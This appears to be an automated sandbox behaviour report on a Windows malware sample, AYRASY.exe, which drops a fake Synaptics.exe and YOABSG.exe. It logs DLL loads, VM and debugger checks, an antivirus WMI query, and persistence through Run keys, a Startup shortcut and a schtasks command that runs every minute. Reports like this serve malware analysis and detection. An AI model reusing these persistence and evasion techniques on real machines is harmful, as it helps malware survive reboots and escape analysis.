Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: netapi32.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: uxtheme.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: windows.storage.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: wldp.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: textshaping.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: profapi.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: propsys.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: ntmarta.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: iertutil.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: sspicli.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: winhttp.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: iphlpapi.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: mswsock.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: winnsi.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: urlmon.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: srvcli.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: netutils.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: dnsapi.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: rasadhlp.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: fwpuclnt.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: schannel.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: mskeyprotect.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: ntasn1.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: msasn1.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: dpapi.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: cryptsp.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: rsaenh.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: cryptbase.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: gpapi.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: napinsp.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: pnrpnsp.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: wshbth.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: nlaapi.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: winrnr.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: ncrypt.dll
Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Section loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSection loaded: propsys.dll
                                Source: C:\Users\user\Desktop\AYRASY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                Source: WBHUSK.lnk.2.drLNK file: ..\..\..\..\..\Windata\YOABSG.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\qfn7FBS.iniJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                                Source: AYRASY.exeStatic file information: File size 1750016 > 1048576
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                                Source: AYRASY.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x100c00
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_002E20D0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_002E20D0
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00178D99 push edi; retn 0000h2_2_00178D9B
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00178F0E push F7FFFFFFh; retn 0000h2_2_00178F13
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00197795 push ecx; ret 2_2_001977A8
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009B8D99 push edi; retn 0000h9_2_009B8D9B
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009B8F0E push F7FFFFFFh; retn 0000h9_2_009B8F13
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009D7795 push ecx; ret 9_2_009D77A8
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1

                                Persistence and Installation Behavior

                                Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | File created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                Source: C:\Users\user\Desktop\AYRASY.exe | File created: C:\ProgramData\Synaptics\RCX4413.tmp
                                Source: C:\Users\user\Desktop\AYRASY.exe | File created: C:\ProgramData\Synaptics\Synaptics.exe
                                Source: C:\Users\user\Desktop\AYRASY.exe | File created: C:\Users\user\Desktop\._cache_AYRASY.exe

                                Boot Survival

                                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WBHUSK.lnk
                                Source: C:\Users\user\Desktop\AYRASY.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WBHUSK
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_0018F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_0018F78E
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001D7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_001D7F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009CF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,9_2_009CF78E
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A17F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,9_2_00A17F0E
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_00191E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00191E5A
                                Source: C:\Users\user\Desktop\AYRASY.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeWindow / User API: threadDelayed 4998Jump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeWindow / User API: foregroundWindowGot 1423Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeAPI coverage: 6.5 %
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeAPI coverage: 3.8 %
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe TID: 6708Thread sleep time: -49980s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7404Thread sleep time: -1080000s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7996Thread sleep time: -60000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeThread sleep count: Count: 4998 delay: -10Jump to behavior
                                Source: Yara matchFile source: 00000007.00000002.3411280080.0000000002D20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.3411537097.0000000002D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.3411537097.0000000002D97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3460, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0018DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_0018DD92
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_001C2044
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_001C219F
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_001C24A9
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_001B6B3F
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_001B6E4A
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_001BF350
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001BFD47 FindFirstFileW,FindClose,2_2_001BFD47
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_001BFDD2
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A02044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00A02044
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A0219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00A0219F
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_00A024A9
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_009F6B3F
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_009F6E4A
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_009FF350
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009CDD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_009CDD92
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_009FFDD2
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009FFD47 FindFirstFileW,FindClose,9_2_009FFD47
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_0018E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_0018E47B
Source: C:\ProgramData\Synaptics\Synaptics.exe | Thread delayed: delay time: 60000
Source: C:\ProgramData\Synaptics\Synaptics.exe | Thread delayed: delay time: 60000
Source: C:\Users\user\Desktop\AYRASY.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\AYRASY.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\Desktop\AYRASY.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\AYRASY.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\Desktop\AYRASY.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\AYRASY.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: Amcache.hve.17.dr | Binary or memory string: VMware
Source: Amcache.hve.17.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.17.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.17.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.17.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.17.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.17.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.17.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.17.dr | Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: ._cache_AYRASY.exe, 00000002.00000002.3412593994.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.000000000072B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.17.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.17.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.17.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.17.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ._cache_AYRASY.exe, 00000002.00000002.3417393779.00000000047FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: YOABSG.exe, 00000016.00000003.3315057318.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\<
Source: Amcache.hve.17.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.17.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.17.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.17.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.17.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.17.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.17.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.17.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.17.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.17.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.17.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.17.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.17.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.17.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.17.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.17.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Process information queried: ProcessInformation
Source: C:\ProgramData\Synaptics\Synaptics.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001C703C BlockInput,2_2_001C703C
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_0017374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_0017374E
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001A46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,2_2_001A46D0
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_002E20D0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_002E20D0
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_0019A937 GetProcessHeap,2_2_0019A937
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_00198E19 SetUnhandledExceptionFilter,2_2_00198E19
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_00198E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00198E3C
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009D8E19 SetUnhandledExceptionFilter,9_2_009D8E19
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009D8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_009D8E3C
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001ABE95 LogonUserW,2_2_001ABE95
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_0017374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_0017374E
Source: ._cache_AYRASY.exe, 00000002.00000002.3412593994.0000000001446000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ^wmi.execquery(select * from antivirusproduct);memstr_bf895f82-a
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s4gf0ps7b8pb2bx2jmemstr_3c2463c1-e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v4mq1xs3or6b2kv4rk7iu5kmemstr_b49c579c-e
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d8vw0fa6gmemstr_5bb2bd9f-3
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d6vk9ij3sk4vmemstr_dab2e734-f
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e3gw0mn6cg4i3lu1wa5zmemstr_50775688-2
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d8yw6wo4nn6tmemstr_1672cb53-c
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: u0fx5js0u8yy7rs5rc1comemstr_6c562173-8
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e3gw0mn6cg4i3lu1wa5zfmemstr_d1d15c62-b
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e3gw0mn6cg4i3lu1wa5zamemstr_202a37f5-b
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s4gf0ps7b8pb2bx2j1c4vxmemstr_59203cc7-0
Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l6hm3aj4fx2d6vk9ij3sk4vsmemstr_56f594d1-7
